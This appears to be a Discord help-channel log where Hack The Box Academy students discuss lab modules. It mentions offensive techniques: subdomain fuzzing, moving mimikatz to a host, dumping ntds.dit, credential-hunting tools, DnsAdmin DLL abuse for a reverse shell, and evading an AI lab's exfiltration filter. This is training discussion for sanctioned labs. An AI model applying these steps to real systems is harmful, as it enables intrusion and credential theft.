#modules

1 messages Ā· Page 478 of 1

fathom pendant
#

Help articles >>>>>>> FAQ took me 5 seconds to find the relevant help article

cloud urchin
#

@tame sky Please take care to not post content for modules above tier 0

onyx halo
#

Hm not sure what you mean, its going to execute as the entity of the update service on ||backup|| probably nt/system.

thorn solar
gleaming summit
#

Hey can anyone help? I am on the Wifi penetration testing basics module and I have made it to the connecting to wifi networks submodule and I am trying to complete the last question. I went into the freerdp mode and tried to connect to HTB corp and i put in the password and username but it does not connect it keeps telling me to connect. So I went the route of terminal and made a conf file as they showed in the reading but for some reason when I do suplicant it doe snot come up with what is shown in the reading and i can go no further. i am unable to connect to HTB corp.

scenic stump
#

$USD. But I think I shall

#

Will start selling pics to fund my career

gray yacht
granite sandal
#

Hi everyone, Im on the first skill assessment on the Windows Privesc module. Ive got a reverse shell but i cannot find the creds for ldapadmin. I've tried running ||SessionGopher, LaZagne, and about 15 findstr/dir/select-string commands|| but cannot get these creds. Any hints you can offer to point me in the right direction?

gray yacht
granite sandal
silver haven
#

Hi Everyone. I am currently working on the Information Gathering - Web Edition module and am stuck on the Skills assessment. Currently working on questions 3,4,5 and have realized that I need to brute force the subdomains to look at robots.txt file but I cant seem to get any subdomains. I have tried using gobuster, dnsenum, and ffuf with the SecLists wordlists but have no luck. Any suggestions?

swift carbon
#

can I dm one of you about this? having the same problem

tepid marsh
#

when running ffuf

silver haven
#

Ya I checked the size of the target with wc -c and include that number in my ffuf query

scenic stump
#

Did you map the host?

silver haven
#

Trying different word lists within the DNS folder and setting the host to fuzz.inlanefreight.htb. Set -fs to 120 based on the size of the target

#

I tried accessing the robots.txt file of the target but got a 404 error so I’m under the impression I might need to access the robots.txt file of one of the subdomains

scenic stump
#

So you did, echo "<TARGET_IP> <SUBDOMAIN>" | sudo tee -a /etc/hosts ?

silver haven
#

I haven’t found the subdomain yet to update the hosts file

scenic stump
#

Oh, my bad for getting ahead there

#

Can you reach the machine? (ping it)

silver haven
#

Ya which is why I’m confused

scenic stump
#

And if so, what exactly did you run for fuff?

silver haven
#

I updated my host file with the targets ip as well

#

I was wondering if I need to use a different wordlist repo than Seclists

ebon coral
#

Yes, it's worth trying different wordlists

#

If you recall in the secions there were bigger wordlists used also

scenic stump
silver haven
#

I ran a wc -c when I curled the target. Reason behind this is I found that when I ran the ffuf without it I would get many default responses and eliminated those with the fs switch.

silver haven
#

What do you mean by tier?

scenic stump
#

Your box/challenge

#

Is it tier 0 or higher?

#

Rules here are "Discuss all modules here, from the fundamentals to the really mentals, but do not spoil module content over Tier 0."

silver haven
#

Tier 1 I believe

scenic stump
#

@waxen totem Can I give him a curl command or does that count as spoiling?

waxen totem
#

anything goes just not giving answers/writeups directly

scenic stump
waxen totem
scenic stump
waxen totem
#

i.e. if they all return a length of 420 you'd -fs 420 or if they all returned 304 codes you'd -fc 304

silver haven
swift carbon
ebon coral
silver haven
ebon coral
#

Yes. Both the section on subdomain enumeration and vhosts have used different wordlists also.

#

Under /usr/share/seclists/Discovery/DNS/ also.

silver haven
#

Got it. Thanks for the suggestion

ebon coral
#

Welcome! GL and have fun. That was a nice assessment.

small quartz
#

hi i am new to this server can you help me there are a lot of tab pls @waxen totem

small quartz
small quartz
cloud urchin
#

Look at the pinned comments they generally say what the channel is about

small quartz
silver haven
#

Quick followup on my previous thread - I checked my ffuf output and confirmed the size is 120. I continued trying different lists in DNS and Web-Content as @ebon coral suggested and still had no luck. Im currently attempting to find directories instead of vhosts and used all of the directory lists in Web-Content with feroxbuster to try to find a directory that I can search in further with no luck. Can someone lmk if Im on the right path or if I need to step back and simplify my process. Thanks

small quartz
ebon gulch
small quartz
silver haven
#

It’s the information gathering- web edition skills challenge at the end of the module

ebon gulch
#

Ok maybe try to filter the output size thay you keep getting

silver haven
#

I filter it to exclude size 120 and don’t get any other output sizes

#

The issue is I can’t find any of the targets subdomains

acoustic owl
# small quartz hello can you tell me about red and blue team

A red team is a group that simulates an adversary, attempts a physical or digital intrusion against an organization at the direction of that organization, then reports back so that the organization can improve their defenses. Red teams work for the organization or are hired by the organization. Their work is legal, but it can surprise some emplo...

A blue team is a group of individuals who perform an analysis of information systems to ensure security, identify security flaws, verify the effectiveness of each security measure, and make certain all security measures will continue to be effective after implementation.
Some blue team objectives include:

Using risk intelligence and digital foo...

abstract jacinth
#

Hello, advanced sql injections skills assessment lab is very slow, i made boolean based sqli attack to find stuff, i receive only timeout errors.

rain wyvern
ebon coral
rain wyvern
#

solved, thanks

covert obsidian
autumn pilot
#

Yes, but for a specific version of Sliver and will not work on the latest version to my knowledge

gloomy cloak
#

Hello, did you manage to get it working? I am facing similar issue

indigo umbra
fathom pendant
#

Load up the webpage

#

Visit it in firefox/browser

silk ice
#

Hello, I have a question regarding hashcat rules. When is the appropriate context that would require incorporating the rules and how does one start finding out which rule is most appropriate for a given situation and why?

sudden cloud
fathom pendant
indigo umbra
#

let me try

silk ice
fathom pendant
silk ice
fathom pendant
#

If i recall correctly the password attacks module goes over the specific RPC command, if not it's common services

silk ice
#

I will review the module, thanks

midnight chasm
#

HellošŸ¤—. I am stuck at hack the box's module ANDROID FUNDAMENTALS. I am facing problem in last section where we have to find the uid of application.need a bit help.Your cooperation will be appreciated.

hardy frigate
#

Hi guys, anyone has done Skills Assessment I from Introduction to Windows Evasion Techniques?

silver haven
silver haven
#

I have gone back to using gobuster as well and keeping the query simple but havent found any other vhosts

fathom pendant
#

what module/section?

silver haven
#

This is for Information Gathering Web edition the skills assesment last 3 questions

silver haven
fathom pendant
silver haven
fathom pendant
#

then you're not on the right subdomain

silver haven
#

The issue is that I havent found any subdomains

fathom pendant
#

iirc i just used the basic subdomain list; using host headers in FFUF with the following switch -H "HOST: FUZZ.inlanefreight.htb"

silver haven
#

I think ive been overcomplicating it since ive been stuck on it for so long. But I used gobuster and ffuf with most of the DNS subdomain lists and didnt discover any subdomains. Ex: ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://inlanefreight.htb:31335 -H "Host: FUZZ.inlanefreight.htb" -fs 120

fathom pendant
#

i don't recall it being that difficult; are you getting any errors in your ffuf output?

silver haven
#

if i dont have an exclude clause i get many responses all with status =200 and size = 120 so i exculde all responses with size = 120. Other than that the ffuf runs with no output and shows as complete

fathom pendant
#

i used the 110000 list iirc

silver haven
#

I tried that one as well. Is it possible there’s something wrong with my query. I checked my connection and verified my hosts list is updated.

fathom pendant
finite crypt
#

Hi everyone
I'm currently in the Bypassing Encoded References section in the web attacks module
I managed to solve the question at the end using a very primitive way using burpsuite. Can someone please show me the script which should also solve the lab in an alternative way ?

proven gust
#

the module host discovery section 3/12

ocean night
#

I'd remove that. That's a tier 1 module, and that's a lot of information.

#

Read the channel subject.

#

Thank you.

proven gust
#

I will search for myself thank u

ocean night
#

You can ask for advice without revealing so much information

#

Look at how others have posed their questions above

proven gust
#

cool I will give you some commands

fathom pendant
proven gust
fathom pendant
#

Module->book
Section->chapter

proven gust
#

why here is giving us 7 ips okay and second photo give us 3 ips ?

#

and second question

ocean night
#

You're just repeating what you pasted earlier

#

Good lord

proven gust
#

sorry this is first time

fathom pendant
#

Different potential networks with different potential hosts available

fathom pendant
#

I wouldn't look too deep into the example outputs tbh, as they are examples

proven gust
fathom pendant
#

My friend

proven gust
#

yes

fathom pendant
#

Im telling you

#

Don't look too deep into it

proven gust
#

okay I'm sorry

fathom pendant
#

You're overthinking an example

proven gust
#

thank you

fathom pendant
#

The main thing that should be taken away is that you can use a file instead of an IP/hostname

proven gust
#

so the firewall block it because the nmap uses -sn for echo icmp to know the hosts is active or not

fathom pendant
#

That's not what -sn does

#

I suggest reading the documentation

proven gust
#

-sn its disable scanning port

#

and give the devices are here or not

fathom pendant
#

Its icmp, tcp 443, and tcp 80

#

Its not just icmp echo

proven gust
#

how we know the device is there or not by sending the icmp echo

#

here what is says

waxen totem
proven gust
fathom pendant
#

And not every device responds to icmp echo requests

proven gust
fathom pendant
#

It can yes

proven gust
#

same we scanned

#

you know what I got it I understand

fathom pendant
#

Again you're looking too deep into the example

#

The example is using a list of hosts instead of using a cidr notated scan (ip/24)

#

The fact that the list is the same as the first scan is irrelevant

sudden cloud
#

hey guys I'm in the Pivoting Skill Assessment (https://academy.hackthebox.com/app/module/158/section/1441). I don't understand how can I transfer mimikatz.exe from my attack box to server01 (the real hostname is another one, I don't wanna do spoilers). I tried with "proxychains scp mimikatz.exe <user>@<ip>" and also the python server won't work. can anybody help me?

fathom pendant
#

Xfreerdp ^

#

Its saved SO much time for me tbh

silk lagoon
#

Guessing that you used rdp but I’m just guessing I would have to go the chapter/module

fathom pendant
#

It is an rdp situation

silk lagoon
fathom pendant
#

Yeah

#

I actually broke my shares down into the windows and linux tools to transfer over

proven gust
#

I really got it thank you

wild sage
#

Was anyone able to use Snaffler on Credential Hunting in Network Shares? I tried for sometime and then used nxc to answer the questions

#

Just trying to understand how the tool works, but seems to be more of a headache than anything

proven gust
#

I got it becasue its says in second line it depends the firewall if enable it or what if enable will you give the ips it if not it will block the requests

#

CYBERKW90@htb[/htb]$ sudo nmap -sn -oA tnet 10.129.2.18-20| grep for | cut -d" " -f5 10.129.2.18 10.129.2.19 10.129.2.20 this will give us from ip 18 to 20 bit ip right ?

worthy pecan
ebon coral
worthy pecan
#

after 5 days i finally completed the nmap module

fathom pendant
fathom pendant
#

With a ranking system of Black -> super important
Red -> important
...

#

I forget the whole system but its on their gh from what I recall

wild sage
#

Yeah I used their GH to try to understand the commands and I couldn't really understand them

silver haven
ebon coral
proven gust
#

I have question about -sn it will send packets ARP so it will tell the ip which one alive right without -sn used -PE it will be icmp request respon right ?

near maple
#

Hey, could anyone help me with the Broken Authentication skills assessment? I'm past the initial phase but stuck on a part where I'm not sure what I'm doing wrong. I'd rather not post the details here in case it spoils anything for others — is it okay to share?

lapis folio
#

for DP-SGD challenge, I encountered this error

Traceback (most recent call last):
  line 247, in <module>
    mia_acc, mia_adv = compute_mia_advantage(

typeError: cannot unpack non-iterable NoneType object```
brave field
vast mica
#

yes i already found the subdomains but still confused till rn

cloud urchin
#

@ebon gulch Please don't reveal content from modules above tier 0, especially answers for skill assessments

covert obsidian
autumn pilot
#

At the time of writing that was the most recent version of Sliver

earnest bay
#

Hi, I'm stuck on the first question of the ā€œWordPress Hackingā€ module. I have to admit I don't understand the problem. I'm asked to find a file named flag.txt by searching through all the directories. I think I've gone through the entire site but haven't found anything. I’ve opened every folder I could find, and I’ve run scans with HackerTarget, WPScan, and Nuclei. I tried entering URLs directly into the file, but I haven’t found anything except for the flag from question 2. Can someone explain the trick to me?

tranquil wren
#

Goodmorning, i am working on the Preprocessing the Malware Dataset in the Applications of AI in InfoSec, when i run the TARGET_BASE_PATH command after the split folders command, i am not seeing the directory via linux, i see it on jupyter, but the walkthrough suggests i should be seeing it on my attack box.
Does anyone know if i am missing something, i feel like i am. The directory created is supposed to be 'newdata' along with three subdirectories

rose temple
#

Hi everyone. I'm looking for help to complete the last question of the "Active Directory Trust Attacks" module skills assessment. I'm stuck on this for a while now. DM me, please, if you can help! Thanks in advance and have a great day.

gray yacht
rose temple
sudden cloud
#

hey guys, still struggling with file transfers.. I'm doing the Password Attacks Skill Assessment (https://academy.hackthebox.com/app/module/147/section/1356) and I'm at the end, where on the DC I created a shadow copy of c: to get the ntds.dit. before I can dump the administrator hash with impacket-secretsdump I gotta transfer the ntds to my attack box (3 hops from the DC). can anybody help me?

ebon coral
#

I recall I was able to pass around files using smb shares. Also some rdp clients allow copy and pasting files.

tranquil wren
#

python3 -m http.server 8080 #or whatever port isn't being used that you can use

white vale
earnest bay
#

Hi, I'm stuck on the first question of the ā€œWordPress Hackingā€ module. I have to admit I don't understand the problem. I'm asked to find a file named flag.txt by searching through all the directories. I think I've gone through the entire site but haven't found anything. I’ve opened every folder I could find, and I’ve run scans with HackerTarget, WPScan, and Nuclei. I tried entering URLs directly into the file, but I haven’t found anything except for the flag from question 2. Can someone explain the trick to me?

earnest bay
amber sun
#

hello guys i have some problem with XSS module Session Hijacking section can i dm someone?

tranquil wren
tranquil wren
#

okay i just ran through the module real quick, did you spawn the target?

earnest bay
#

but I'll go and check

tranquil wren
#

after you check, are you going to that web page of the ip and port that spawned?

earnest bay
#

Sorry for wasting your time, and thanks for your help. I've managed to display the target, and now I'm running the enumeration again.

tranquil wren
#

honestly to get the flag i didn't run any commands, i just went to webpage and enumerated the directories real quick

tranquil wren
#

following the path of the above curl command right above the question using the target instead of the webpage mentioned

tranquil wren
#

np

silk ice
#

From the pwnbox, I'm running xfreerdp to connect to a target machine but that xfreerdp screen is too small and it doesn't seem to have an option to maximize the screen (or is there?). Is there a way to increase screen borders?

tough blade
#

Bug: sqlplus not installable on Pwnbox — Oracle TNS question cannot be completed as documented

Module: Footprinting
Section: Oracle TNS (Section 15)
Question: "Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer."

Issue:
The walkthrough instructs students to connect to the Oracle database using sqlplus after finding credentials with odat. However, sqlplus is not installed on the Pwnbox and cannot be installed via apt-get. The package oracle-instantclient-sqlplus does not exist in the available repositories.

Running:
sudo apt-get install oracle-instantclient-sqlplus
Returns: E: Unable to locate package oracle-instantclient-sqlplus

Running locate sqlplus only returns Metasploit plugin files — not a usable sqlplus binary.

Steps to reproduce:

  1. Spawn the Oracle TNS target
  2. Complete the full odat install (cx_Oracle + odat dependencies)
  3. Run odat to find credentials (scott/tiger confirmed)
  4. Attempt to run: sqlplus scott/tiger@[IP]/XE as sysdba
  5. Result: bash: sqlplus: command not found

Impact:
The final step of the lab — connecting to Oracle and querying sys.user$ for the DBSNMP hash — cannot be completed using the documented method. The walkthrough assumes sqlplus is available but provides no install instructions for it.

mystic loom
#

Hello! Were you able to get an answer to your question in the end? I'm stuck in the same boat, just can't bypass that "Blocked data exfiltration attempt" message

open violet
#

Yes

#

You can ping me

zenith token
#

I am currently Woring on the "Introduction to Windows Module". The challenge is "Which Windows NT version is installed on the workstation". I used powershell and I am quiet convinced, that the approach is correct... but I can't get the answer to work. Anyone could give me a hint here?

mystic loom
# open violet You can ping me

You won't believe it lol, literally 2mins after I wrote the message, I got it bin_joy For everybody else struggling, poems are cool too you know pepewink

zenith token
fluid linden
#

Guys why I cant see vpn file to download in the module in order to connect?

queen thorn
#

Hi anyone available I am stuck in CDSA path Introduction to Malware Analysis > Code Analysis > Debugging exercise: Reproduce all the debugging procedures mentioned in this section and provide the hidden shellcode-related hex values from the final screenshot as your answer. Remove all spaces.

I have followed the exercise but still getting sandbox detected. If anyone is available for help would be great thank you!

cloud urchin
fluid linden
fiery cosmos
#

I’m currently at the metasploit module, writing & importing modules section. I’m not sure about the part about porting a ruby script into a metasploit module, feels complicated and I’m wondering if this is something that i should learn or just skip over?

#

It’s not explained that well too, it says I should refer to the metasploit documentation to know how to port a script. And it requires a good understanding of the ruby code in the script

fathom pendant
fiery cosmos
#

Good, cuz i feel like something like this needs a whole section with a step-by-step guide for it with questions at the end

cloud urchin
#

It does, please don't post content above tier 0

#

Anyone who has done it doesn't need the additional context, and if you feel like you need to reveal a little more you can ask for a DM

#

you can ask your question just don't post the screen shots, it had a username and content from the module

neat bronze
#

Will someone please help me with the following. happy to discuss in DMs if you need additional info:

  • Module: Attacking Common Services
  • Section: Attacking Email Services
  • Question 1: What is the available username for the domain inlanefreight.htb in the SMTP server?
  • Used several of the enumeration methods to reach the inlanefreight.htb domain. Tried running a dig with the target IP included, added the target and domain name to my /etc/hosts, ran a nslookup, no return for inlanefreight.htb. I also ran the exact command the walkthrough suggested against the domain as well as the target machine. There is no scenario where I retrieve a user name. Also I am making sure to use the user and password list provided by the module resources.
neat bronze
#

Solved. Had to reset the machine 4 times. Wtf is that

mental latch
vast mica
#

pls someone help me. i’m on footprinting modules DNS section. stuck on question 4🄲

vast mica
#

DM me if someone can help

steady valve
fiery cosmos
#

Can someone tell me what archiving a malicious file twice with password protection (both times) ultimately does? It says this is an IDS/IPS evasion technique. Is it supposed to make sure the file reaches the target and gets executed without being flagged?

#

I’m just confused about its end goal

brave field
rain wyvern
#

Hi, what the heck is that

#

learning the web proxies, i am already know it so i'm fast foward it by solving the lab, and get locked @@

#

solved it, i forget to turn off burp suite proxies :v

novel matrix
#

Lol

worn grove
#

This ad blocker detected popup is super annoying and it slows HTB down even with Brave Shield / ad-blocking off. I would rather see an option in user settings to alert when adblock might be blocking something or make it less intrusive, because I expect 99% of the HTB users using a ad-blocker

#

Anyone got a solution here? I tend to think adding the ad block detected popup to the adblock blacklist as well because it keeps popping up even with adblocker disabled

#

I use CloudFlare secure DNS server, so no filtering there

urban island
#

Hi everyone, I am having trouble with installing eyewitness on htb academy, it keeps saying that the package is not found, when i try to install via gitclone, it said that cmake is not available and same thing when i try to sudo apt install cmake

#

would anyone know what to do?

worn grove
# worn grove Anyone got a solution here? I tend to think adding the ad block detected popup t...

Solved it with this tampermoney script (let me know if this is against TOS, but this is giving me technical issues, that's why I share it):

// ==UserScript==
// @name         Mute adblock detected modal on academy.hackthebox.com
// @match        https://academy.hackthebox.com/*
// @run-at       document-start
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    try {
        sessionStorage.setItem('htb-adblockBannerDismissed', 'true');
        sessionStorage.setItem('htb-adblockDetected', 'true');
    } catch (e) {
        console.warn('[HTB silence] sessionStorage write failed:', e);
    }
})();
worn grove
urban island
worn grove
urban island
lost vessel
#

At this point I need help. I've been on Skills Assessment - Password Attacks for days now. I got access to the JUMP01 server over RDP with the cred found in the DMZ server. I cracked one psafe hash found in the FILE server. All those don't seem to be useful in accessing anything, I need help!!

#

I need a gentle nudge in the right direction or someone I can dm... frustration is building up, been on it for several days.

fleet spear
#

@lost vessel i DMED you

sudden cloud
#

hey guys, I'm doing the AD Skill Assessment II and I got stuck at the question "Use a common method to obtain weak credentials for another user". I tried everything (also password spraying with 3 different wordlists for the 1000 most common passwords). I eventually gave up and looked at some walkthrough, apparently everybody tried psw spraying "Welcome1" ... is this really the only method?? just guessing?

uneven oracle
#

Good fellows... I am on the Linux Target section of the "Pentest in a nutshell" module. For some reason it isn't actually letting me ssh in the the private key. It still ask for the password.. anyone have this issue or have an answer.

ssh -i id_rsa john@10.129.233.210
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
john@10.129.233.210's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-135-generic x86_64)

System information as of Thu Apr 23 01:43:31 PM UTC 2026

System load: 0.08
Usage of /: 81.5% of 13.68GB
Memory usage: 24%
Swap usage: 0%
Processes: 171
Users logged in: 0
IPv4 address for eth0: 10.129.233.210
IPv6 address for eth0: dead:beef::250:56ff:fe94:a637

Expanded Security Maintenance for Applications is not enabled.

Ubuntu

Canonical provides Ubuntu Pro with 10 years of enhanced CVE patching, FIPS compliance, CIS and DISA-STIG profiles and enterprise-grade open source software security with a single subscription for open source supply chain provenance.

fleet spear
scenic arrow
#

Hey gang! Has anyone noticed performance issues when trying to ping a HTB target? I'm working on the "Attacking Common Services" module, "Attacking Email" section. I start the target, connect to VPN, but I'm not able to ping the target. After waiting for a few seconds or a minute, it's able to ping, but then I can't ping it anymore. I've tried redownloading a new VPN profile, closing the browser and VM, etc...

prime viper
#

error message looks something along these lines "[15:50:14:881] [546575:00085710] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[15:50:14:881] [546575:00085710] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[15:50:29:905] [546575:00085710] [ERROR][com.freerdp.core] - [freerdp_tcp_default_connect]: ERRCONNECT_CONNECT_FAILED [0x00020006]
[15:50:29:905] [546575:00085710] [ERROR][com.freerdp.core] - [freerdp_tcp_default_connect]: failed to connect to 10.129.66.21
[15:50:29:905] [546575:00085710] [ERROR][com.freerdp.core.nego] - [nego_connect]: Failed to connect"

reef osprey
#

are you talking about de Drozer section?

cloud urchin
reef osprey
scenic arrow
prime viper
#

Now I have one tunnel running but no clue if that's normal or if that's an issue

scenic arrow
#

Did xfree work on the new VPN?

prime viper
prime viper
#

@scenic arrow Fixed it I had Tun2 and Tun0 for some reason

#

im assuming the Network just didn't know which tunnel to use so it claimed the IP was innacesible

untold tulip
#

hey. are there plans to translate the academy to spanish?

prime viper
untold tulip
white vale
#

All the info in spanish is very weird man. Just do English

#

Even some concepts

#

Dont make a lot of sense

fathom pendant
uneven oracle
uneven oracle
frank dust
#

Hi, is it possible to suggest changes/uplift to the Academy content? I'm looking to point a resource being offered under the "Advanced XSS and CSRF Exploitation" module to a more up to date, maintained resource doing the equivalent thing

frank dust
cedar umbra
#

I'm on the intercepting web proxies module and my application seems to be different to the one in the demo

rare condor
nocturne river
#

Hello, sorry if I am posting in the wrong place. I have a problem with Attacking WiFi protected setup (WPS)

#

I can’t pass these warnings

foggy jackal
#

hey, can i dm about this,,i am stuck here too

severe inlet
#

my target isn't spawning its been on "Target spawning." for like 5 mins anyone having the same idea?

indigo umbra
stray arrow
earnest bay
#

@tranquil wren can I send you a private message?

magic forum
#

you ever get this to work? runing into the same issue

ancient hill
#

Hi all, doing introduction to ai red teaming, first question of the module. It asks to ā€œManipulate the fixed input message by appending data to trick the classifier into classifying the message as ham. Submit the flag you obtain after providing an input that satisfies the lab requirements.ā€

What is the fixed input message? I didn’t find it in the zip file. I used the message used as an example in the course, but no flag came back. Am I supposed to send the message to an API at the machine IP? There were no instructions for an API that I saw

primal ginkgo
#

Hey having some abnormal trouble getting through module "Pentest in a Nutshell" on a specific question not accepting the input for "What is the exact OS Version that WinPEAS delivers?"

Weird part is I've done everything WinPEAS, Starkiller, SILENTTRINITY, Sliver, and Merlin and all that happens at every point either it tells me 'insufficent' permissions and throws a 'DENIED' then the shell dies. Even went as far as changing my VPN Server.

primal ginkgo
leaden island
#

Yo guys, im on win privesc, DnsAdmin group abuse section.

#

Not on computer rn, but the section was about using the dmscmd.exe utility, that the DnsAdmin group has privileges to set a reg value (name serverdll or similar thing), which accepts the path of any dll without verification, and that the dns server service runs as SYSTEM, once the dns server restarts it executes the dll

#

The section used a payload dll to add a user to the domain admins group

#

My question was (since likely the dns server is running in the DC itself) if i wanted to load a dll that returns a reverse shell, will the dns server start normally ? Like does the dll load as a sub process, or does it interrupt the dns process and therefore cause problems ?

chilly helm
#

Hey, I’m having trouble connecting to DC01 in the Windows Attack and Defense lab. The machine doesn’t seem to respond, and I’m unable to establish an RDP connection. Could you please check if the instance is running or if there’s any issue with the lab environment?

chilly helm
#

i have pinnged the dc01 ip and now response

cloud urchin
#

Labs are private instances, no one can check except support on the website. Since it's the weekend you won't get a response till the business week. Most likely it's something on your end, try killing all VPN processes, make sure you don't run the pwnbox and VPN at the same time, maybe redownload the VPN file and/or change regions or servers.

cloud forum
#

can someone help me in active directory enumeration and attacks skill assessment 1
im in the question Find cleartext credentials for another domain user. Submit the username as your answer.
||i have tried dumping lsass and the hash wasnt crackable and tried to hunt for credentials but also failed|| im stuck here

#

i have found the user but not the password

gloomy yarrow
#

Hello everyone. I am new to HTB and just started my journey. currently im im trying to finish the network foundations course and am stuck on "What is the the name of the Program listening on localhost:5901 of the Pwnbox?" what i did: || i used nmap on 127.0.0.1 there the port is open and shown as vnc on the target its closed and also vnc.|| but the anser box refuses any variation of || vnc|| i can think of. can anyone tell me i f im thinking in circles or have encountered a bug? DMs regarding this are welcome.

gray yacht
cloud forum
wise marsh
#

Hi i'm on "Attacking Common Services - Easy"
I don't understand how I'm supposed to determine a valid login combination (||besides the SMTP login||), because whenever I try to use Hydra on any protocol, I get a lockout. And neither the specified pws.list, nor rockyou, nor any other lists are able to return a valid password

cloud urchin
#

@abstract imp Careful about revealing content above tier 0. that's lot of spoilers for the challenge right there.

finite crypt
#

Hi everyone, I need help in this:-
In the web attacks module, percisely in the Chaining IDOR Vulnerabilities section.
the question is "Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page."

I'm not good at scripting so can someone help me do this manually if possible ?

fast shoal
#

hey, I just found a bug on the exercise from the module command injections (section Bypassing Other Blacklisted Characters). The ls command doesn't work and there is no error message from the filter contrary to whoami for example. I can't find the user

cloud urchin
leaden island
#

yo guys, im having this issue with smbclient:

_samba_cmd_set_machine_account_s3: failed to open secrets.tdb to obtain our trust credentials for WORKGROUP
Failed to set machine account: NT_STATUS_INTERNAL_ERROR

i tried different solutions but no lucl. anybody familiar with it ?

lavish isle
#

Have someone experienced the same issue while trying to connect to ssh ?

lyric bluff
#

the servers get laggy a bit at night

#

so dw

lavish isle
#

i'll try to reset the target and see

hardy swallow
#

Explorer.exe

lavish isle
#

I redownload another vpn file and respawn the target but nothing changed

#

I can ping the target tho and the port 22 is open so I don't know how to fix this

leaden island
#

yo guys, im on win privesc, print operator group abuse. section states:

Next, from a Visual Studio 2019 Developer Command Prompt, compile it using cl.exe.
Compile with cl.exe


Microsoft (R) C/C++ Optimizing Compiler Version 19.28.29913 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.

EnableSeLoadDriverPrivilege.cpp
Microsoft (R) Incremental Linker Version 14.28.29913.0
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:EnableSeLoadDriverPrivilege.exe
EnableSeLoadDriverPrivilege.obj

```however, running it i get:

** Visual Studio 2026 Developer Command Prompt v18.5.1
** Copyright (c) 2026 Microsoft Corporation


C:\Windows\System32>cl
'cl' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\System32>cl.exe
'cl.exe' is not recognized as an internal or external command,
operable program or batch file.

is that command deprecated on newer versions ? what is the replacement for it ?
cloud urchin
#

Sounds like the binary isn't in your path, call to it directly like .\cl.exe

sly kelp
lavish isle
#

But the team will fix it for sure

thorn solar
#

Just wanted to mention, the Conditional Execution section of Introduction to Bash Scripting is extremely difficult on macOS because macOS and Linux base64 commands are slightly different, so without Googling a huge HTB forum thread about it where everyone is complaining and confused, it's impossible to do the challenge on macOS. Not sure if this could potentially be annotated or made clear somehow?

#

I suppose doing it on the Pwnbox would make it work fine, but I just spun up a .sh script locally since the exercise is so basic

sly kelp
late shuttle
#

Hey guys, stuck on the footprinting easy challenge. Just wondering if I can help me out, wondering if the roadblock I hit is by design or something wrong.

fathom pendant
late shuttle
fathom pendant
#

yeah you don't need to do anything outside of what the module has shown

ebon gulch
fathom pendant
sinful tangle
#

Hiya, I'm working on the Skills Check assessment for the CDSA role path, under the Incident Handling module--and running into an issue where TheHive keeps logging me out after what seems like a very brief user session. I can't get more than a few clicks into the UI, glancing back over at my other monitor to read the question and back before seeing I'm already logged out again.

Is this something I need to check with my local browser settings or is this tucked away somewhere in TheHive UI?

winter smelt
#

Hi, I'm currently on Active Directory Enumeration and Attacks > Kerberoasting - from Linux. Having trouble with Qestion 2, finding the 'powerful local group' of the user we found out in Q1. I have seen a couple of ways to find out the groups a user is in but none are working. I can't use nxc ldap <ip> -u <username> -p <password> --groups "<group>" as nxc isn't installed on the spun-p machine. I also found sudo crackmapexec smb 172.16.5.5 -u <username> -p <password> -M groupmembership -o USER=<username> but errors out as 'module not found'. if anyone has another idea on how to answer this, please let me know

waxen totem
winter smelt
ebon gulch
thorn solar
#

This Introduction to Bash Scripting has nightmare fuel questions. Doing the Bash code takes 1 minute, followed by 2 hours of trying to understand why the base64 encoding is mismatched, whether it's supposed to encode phantom newlines, and no matter what you submit it's an invalid answer. ChatGPT also can't figure it out, but the question was simply to add an if statement and submit the last 20 chars.

graceful fjord
#

Hello, could be off topic but is there any active coupon code for annual HTB academy subscription? i'm planning to subscribe but it's a bit expensive šŸ˜…

cyan veldt
tropic pumice
#

All of other questions could be answered easily but except the question 3.

autumn pilot
#

you need to submit the whole value

tropic pumice
autumn pilot
#

Reach out to support to troubleshoot your connection to the VPN, etc.

sudden cloud
#

hey! can somebody help me in the dm? I can't make a pass the hash work. I'm doing the AD skill assessment ii

quartz spire
#

Hello, I’m currently working through the AI Red Teamer path and have reached the Trojan Attack module. It involves quite a bit of Python coding, which I’m finding challenging.

I wanted to ask will this be a limitation for the COAE exam? Specifically, how important are strong Python skills for passing? Also, while solving the Trojan Attack challenge, I used AI tools (like ChatGPT) to help with some parts. Are AI assistance allowed during the exam, and if so, to what extent?

Just trying to understand how best to prepare and what I should have in my skillset before attempting the exam. Thanks!

fathom pendant
#

There are no tool restrictions for the exam

tardy ingot
#

Hey I am been going though Windows Event Logs and Finding Evil and I was wondering about the question 1. I did everything as it mention require to show the log from Event ID 7 and run the reflect DLL but it doesnt seem to update the Event Viewer

#

and I see some walkthough but they all bypass it by just calculate the Hash so it kind of defeat the purpose of execute the attack to see it you know

#

so not sure what am I missing here

uneven oracle
#

Good peoples... I am on the Pentest in a nutshell module, on the Windows system enumeration portion... I downloaded and ran the winPEAS script on the Windows target. I can not find within the winPEAS output the exact OS version. WTH?

dire summit
#

Hey, can someone help me with the Windows Privilege escalation module? I'm in the first bit and I am so confused: the answer should definitely be right but it keeps saying it's not

unique valve
#

Is it possible to start another HTB Academy exam while another is in review? This would be a cool feature.

fathom pendant
#

no

unique valve
fathom pendant
unique valve
#

Not complaining btw. Theres lots of awesome learning to be had on HTB. Just sharing an idea to keep momentum going!

fathom pendant
#

If you wanna share an idea : /feedback

neon echo
#

Hello. I'm about to start the Penetration Tester Job role Path and I was wondering if anyone knows if I can stream or make video walkthroughs as I go?

quaint fossil
#

Don't quote me on that though.

fathom pendant
fathom pendant
